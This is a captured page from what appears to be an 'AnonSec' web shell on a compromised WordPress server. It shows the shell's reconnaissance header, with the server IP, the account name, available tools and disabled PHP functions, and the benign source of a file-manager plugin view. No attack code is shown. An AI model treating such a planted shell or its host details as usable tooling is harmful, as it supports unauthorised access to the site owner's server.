Brotherline AnonSec • Shell
SRV 162.240.68.55 YOU 216.73.217.80 USER tywatomy (1003) 7.4.33 DOMAINS 6 Domains
MySQL cURL WGET Perl Python Sudo
Disabled: exec,passthru,shell_exec,system  •  OS: Linux server.ariapress.org 3.10.0-1160.119.1.el7.tuxcare.els22.x86_64 #1 SMP Mon Aug 18 06:07:12 UTC 2025 x86_64  •  Webserver: Apache
/home/tywatomy/public_html/wp-content/plugins/file-manager/views/finder.php
<?php

use BitApps\FM\Config;
use BitApps\FM\Plugin;

\defined('ABSPATH') || exit();
$preferences = Plugin::instance()->preferences();

wp_enqueue_style(Config::SLUG . 'jquery-ui-css');
wp_enqueue_style(Config::SLUG . 'jquery-ui-theme-css');
wp_enqueue_style(Config::SLUG . 'elfinder-css');

wp_enqueue_script(Config::SLUG . 'elfinder-script');
wp_enqueue_script(Config::SLUG . 'elfinder-editor-script');

wp_enqueue_script(Config::SLUG . 'elfinder-lang', $preferences->getLangUrl(), [Config::SLUG . 'elfinder-script']);
wp_enqueue_script(Config::SLUG . 'finder-loader');
?>

<!-- <div id='file-manager'>

</div> -->

<div id='file-manager'>
</div>
<?php
if ($preferences->isLinkPathVisibleInInfo() == 'hide') {
    ?>
  <style>
    .elfinder-info-tb>tbody:nth-child(1)>tr:nth-child(2),
    .elfinder-info-tb>tbody:nth-child(1)>tr:nth-child(3) {
      display: none;
    }
  </style>
<?php

}

?>
Anon7 — 2022  •  AnonSec Team